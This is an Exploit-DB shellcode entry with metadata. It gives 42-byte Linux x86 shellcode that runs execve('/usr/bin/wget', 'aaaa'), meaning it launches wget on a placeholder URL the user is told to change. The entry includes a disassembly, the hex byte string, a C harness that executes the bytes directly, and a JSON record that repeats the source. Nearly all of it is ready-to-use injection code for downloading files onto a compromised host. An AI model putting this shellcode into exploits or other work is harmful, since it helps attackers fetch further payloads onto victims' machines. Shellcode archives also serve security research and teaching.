ID EDB-ID:13702
Type exploitdb
Reporter Jonathan Salwan
Modified 2010-05-17T00:00:00
Description
Linux x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes. Shellcode exploit for linux platform
/*
Title: Linux x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes
Author: Jonathan Salwan <submit AT shell-storm.org>
Web: http://www.shell-storm.org
Twitter: http://twitter.com/jonathansalwan
!Database of Shellcodes http://www.shell-storm.org/shellcode/
08048054 <.text>:
8048054: 6a 0b push $0xb
8048056: 58 pop %eax
8048057: 99 cltd
8048058: 52 push %edx
8048059: 68 61 61 61 61 push $0x61616161
804805e: 89 e1 mov %esp,%ecx
8048060: 52 push %edx
8048061: 6a 74 push $0x74
8048063: 68 2f 77 67 65 push $0x6567772f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 68 2f 75 73 72 push $0x7273752f
8048072: 89 e3 mov %esp,%ebx
8048074: 52 push %edx
8048075: 51 push %ecx
8048076: 53 push %ebx
8048077: 89 e1 mov %esp,%ecx
8048079: cd 80 int $0x80
804807b: 40 inc %eax
804807c: cd 80 int $0x80
*/
#include <stdio.h>
char sc[] = "\x6a\x0b\x58\x99\x52"
"\x68\x61\x61\x61\x61" // Change it
"\x89\xe1\x52\x6a\x74"
"\x68\x2f\x77\x67\x65"
"\x68\x2f\x62\x69\x6e"
"\x68\x2f\x75\x73\x72"
"\x89\xe3\x52\x51\x53"
"\x89\xe1\xcd\x80\x40"
"\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(sc));
(*(void(*)()) sc)();
return 0;
}
{"hash": "3fcce67e4c516734d5c17beb9f85c472bc2dea6c69f9347c33e1a605bff7e21f", "id": "EDB-ID:13702", "lastseen": "2016-02-01T18:19:02", "enchantments": {"vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/13702/", "description": "Linux x86 execve(\"/usr/bin/wget\", \"aaaa\"); - 42 bytes. Shellcode exploit for linux platform", "title": "Linux x86 execve\"/usr/bin/wget\", \"aaaa\"; 42 bytes", "sourceData": "/*\r\nTitle: \t Linux x86 execve(\"/usr/bin/wget\", \"aaaa\"); - 42 bytes\r\nAuthor:\t Jonathan Salwan <submit AT shell-storm.org>\r\nWeb:\t http://www.shell-storm.org\r\nTwitter: http://twitter.com/jonathansalwan\t\r\n\r\n\r\n!Database of Shellcodes http://www.shell-storm.org/shellcode/\r\n\r\n\r\n08048054 <.text>:\r\n 8048054:\t6a 0b \tpush $0xb\r\n 8048056:\t58 \tpop %eax\r\n 8048057:\t99 \tcltd \r\n 8048058:\t52 \tpush %edx\r\n 8048059:\t68 61 61 61 61 \tpush $0x61616161\r\n 804805e:\t89 e1 \tmov %esp,%ecx\r\n 8048060:\t52 \tpush %edx\r\n 8048061:\t6a 74 \tpush $0x74\r\n 8048063:\t68 2f 77 67 65 \tpush $0x6567772f\r\n 8048068:\t68 2f 62 69 6e \tpush $0x6e69622f\r\n 804806d:\t68 2f 75 73 72 \tpush $0x7273752f\r\n 8048072:\t89 e3 \tmov %esp,%ebx\r\n 8048074:\t52 \tpush %edx\r\n 8048075:\t51 \tpush %ecx\r\n 8048076:\t53 \tpush %ebx\r\n 8048077:\t89 e1 \tmov %esp,%ecx\r\n 8048079:\tcd 80 \tint $0x80\r\n 804807b:\t40 \tinc %eax\r\n 804807c:\tcd 80 \tint $0x80\r\n*/\r\n\r\n#include <stdio.h>\r\n\r\nchar sc[] = \t\"\\x6a\\x0b\\x58\\x99\\x52\"\r\n\t\t\"\\x68\\x61\\x61\\x61\\x61\" // Change it\r\n\t\t\"\\x89\\xe1\\x52\\x6a\\x74\"\r\n\t\t\"\\x68\\x2f\\x77\\x67\\x65\"\r\n\t\t\"\\x68\\x2f\\x62\\x69\\x6e\"\r\n\t\t\"\\x68\\x2f\\x75\\x73\\x72\"\r\n\t\t\"\\x89\\xe3\\x52\\x51\\x53\"\r\n\t\t\"\\x89\\xe1\\xcd\\x80\\x40\"\r\n\t\t\"\\xcd\\x80\";\r\n\r\nint main(void)\r\n{\r\n \tfprintf(stdout,\"Length: %d\\n\",strlen(sc));\r\n\t(*(void(*)()) sc)();\r\n \r\nreturn 0;\r\n}\r\n", "objectVersion": "1.0", "cvelist": [], "published": "2010-05-17T00:00:00", "osvdbidlist": [], "references": [], "reporter": "Jonathan Salwan", "modified": "2010-05-17T00:00:00", "href": "https://www.exploit-db.com/exploits/13702/"}
{"result": {}}